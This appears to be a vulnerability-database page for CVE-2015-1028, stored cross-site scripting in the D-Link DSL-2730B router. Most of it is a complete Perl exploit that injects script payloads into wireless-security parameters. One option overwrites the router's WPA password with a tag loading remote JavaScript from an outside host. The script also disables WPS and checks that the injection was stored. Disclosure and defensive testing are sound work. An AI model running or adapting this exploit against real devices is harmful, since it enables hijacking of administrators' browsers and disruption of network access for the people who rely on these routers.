CVE-2015-1028
Description
Multiple cross-site scripting (XSS) vulnerabilities in D-Link DSL-2730B router (rev C1) with firmware GE_1.01 allow remote authenticated users to inject arbitrary web script or HTML via the (1) domainname parameter to dnsProxy.cmd (DNS Proxy Configuration Panel); the (2) brName parameter to lancfg2get.cgi (Lan Configuration Panel); the (3) wlAuthMode, (4) wl_wsc_reg, or (5) wl_wsc_mode parameter to wlsecrefresh.wl (Wireless Security Panel); or the (6) wlWpaPsk parameter to wlsecurity.wl (Wireless Password Viewer).
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
D-Link DSL-2730B Modem - 'Lancfg2get.cgi' Persistent Cross-Site Scripting
D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored DnsProxy.cmd
D-Link DSL-2730B Modem - Cross-Site Scripting Injection Stored Wlsecrefresh.wl & Wlsecurity.wl
# Exploit Title: D-Link DSL-2730B Modem wlsecrefresh.wl & wlsecurity.wl Exploit XSS Injection Stored
# Date: 11-01-2015
# Exploit Author: Mauricio Correa
# Vendor Homepage: www.dlink.com
# Hardware version: C1
# Version: GE 1.01
# Tested on: Windows 8 and Linux
#!/usr/bin/perl
#
# Date dd-mm-yyyy: 11-11-2014
# Exploit for D-Link DSL-2730B
# Cross Site Scripting (XSS Injection) Stored in wlsecrefresh.wl
# Developed by Mauricio Corrêa
# XLabs Information Security
# WebSite: www.xlabs.com.br
# More information: www.xlabs.com.br/blog/?p=339
#
# CAUTION!
# This exploit disables some features of the modem (every request sets
# wl_wsc_mode=disabled, and option 4 overwrites the WPA PSK in wlWpaPsk),
# forcing the administrator of the device to open the wireless security page
# to reconfigure it. The stored script then executes in the browser of the
# administrator, or of any other internal-network user who opens that page.
#
# Use with caution!
# Use at your own risk!
#
use strict;
use warnings;
use diagnostics;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Headers;
use URI::Escape;

if (@ARGV != 4) {
    print "\n";
    print "XLabs Information Security www.xlabs.com.br\n";
    print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
    print "Developed by Mauricio Correa\n";
    print "Contact: mauricio\@xlabs.com.br\n";
    print "Usage: perl $0 http://host_ip/ user pass option\n";
    print "\n";
    print "Options: 1 - Parameter: wlAuthMode\n";
    print "         2 - Parameter: wl_wsc_reg\n";
    print "         3 - Parameter: wl_wsc_mode\n";
    print "         4 - Parameter: wlWpaPsk (executes when the admin clicks to display the wireless password)\n";
    exit 1;
}

my ($ip, $user, $pass, $opt) = @ARGV;
chomp($ip);
$ip =~ s{/+$}{};    # strip any trailing slash so the CGI path can be appended

print "XLabs Information Security www.xlabs.com.br\n";
print "Exploit for POC D-Link DSL-2730B Stored XSS Injection in wlsecrefresh.wl\n";
print "Developed by Mauricio Correa\n";
print "Contact: mauricio\@xlabs.com.br\n";
print "[+] Exploiting $ip/ ...\n";

# URL-encoded  ';alert('//XLabsSec');//  : closes the single-quoted JavaScript
# string literal the admin page stores the value in, runs alert(), and comments
# out the rest of the line.
my $payload = "%27;alert(%27//XLabsSec%27);//";

my $ua   = LWP::UserAgent->new;
my $hdrs = HTTP::Headers->new(
    'Accept'     => 'text/plain',
    'User-Agent' => 'XLabs Security Exploit Browser/1.0',
);
$hdrs->authorization_basic($user, $pass);    # the router's web UI uses HTTP Basic auth

print "[+] Preparing...\n";
my $url_and_payload = "";
if ($opt == 1) {
    # Payload appended to wlAuthMode
    $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=1$payload"
                     . "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
} elsif ($opt == 2) {
    # Payload appended to wl_wsc_reg
    $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled&wl_wsc_reg=disabled$payload&wlAuth=0&wlAuthMode=997354"
                     . "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
} elsif ($opt == 3) {
    # Payload appended to wl_wsc_mode
    $url_and_payload = "$ip/wlsecrefresh.wl?wl_wsc_mode=disabled$payload&wl_wsc_reg=disabled&wlAuth=0&wlAuthMode=997354"
                     . "&wlKeyBit=0&wlPreauth=0&wlSsidIdx=0&wlSyncNvram=1&wlWep=disabled&wlWpa=&wsc_config_state=0";
} elsif ($opt == 4) {
    # Replaces the WPA PSK itself with an HTML payload; it fires when the
    # "show password" control renders the stored key.
    $payload = "GameOver%3Cscript%20src%3D%22http%3A%2f%2fxlabs.com.br%2fxssi.js%22%3E%3C%2fscript%3E";
    $url_and_payload = "$ip/wlsecurity.wl?wl_wsc_mode=enabled&wl_wsc_reg=disabled&wsc_config_state=0&wlAuthMode=psk%20psk2&wlAuth=0&"
                     . "wlWpaPsk=$payload&wlWpaGtkRekey=0&wlNetReauth=36000&wlWep=disabled&wlWpa=aes&wlKeyBit=0&wlPreauth=0&"
                     . "wlSsidIdx=0&wlSyncNvram=1";
} else {
    print "[-] Choose one option!\n";
    exit 1;
}

my $req = HTTP::Request->new("GET", $url_and_payload, $hdrs);
print "[+] Prepared!\n";
print "[+] Requesting...\n";
my $resp = $ua->request($req);
if ($resp->is_success) {
    print "[+] Successfully Requested!\n";
    # Fetch the page that renders the stored settings and check that the
    # payload was written back into it unescaped.
    print "[+] Checking whether the payload was stored...\n";
    my $url = "$ip/wlsecurity.html";
    $req = HTTP::Request->new("GET", $url, $hdrs);
    my $resp2 = $ua->request($req);
    if ($resp2->is_success) {
        my $result = $resp2->as_string;
        if ($opt == 4) {
            # The page wraps the PSK in single quotes and backslash-escapes the
            # double quotes, so look for the value in the form it is rendered in.
            $payload = "%27GameOver%3Cscript%20src%3D%5C%22http%3A%2f%2fxlabs.com.br%2fxssi.js%5C%22%3E%3C%2fscript%3E%27";
        }
        if (index($result, uri_unescape($payload)) != -1) {
            print "[+] Successfully Exploited!\n";
        } else {
            print "[-] Not Exploited!\n";
        }
    } else {
        print "[-] Could not fetch wlsecurity.html: " . $resp2->status_line . "\n";
    }
} else {
    print "[-] Oops!\n";
    print $resp->message . "\n";
}
References
- http://www.exploit-db.com/exploits/35747
- http://www.exploit-db.com/exploits/35750
- http://www.exploit-db.com/exploits/35751
- http://www.xlabs.com.br/blog/?p=339
CWEs
CWE-79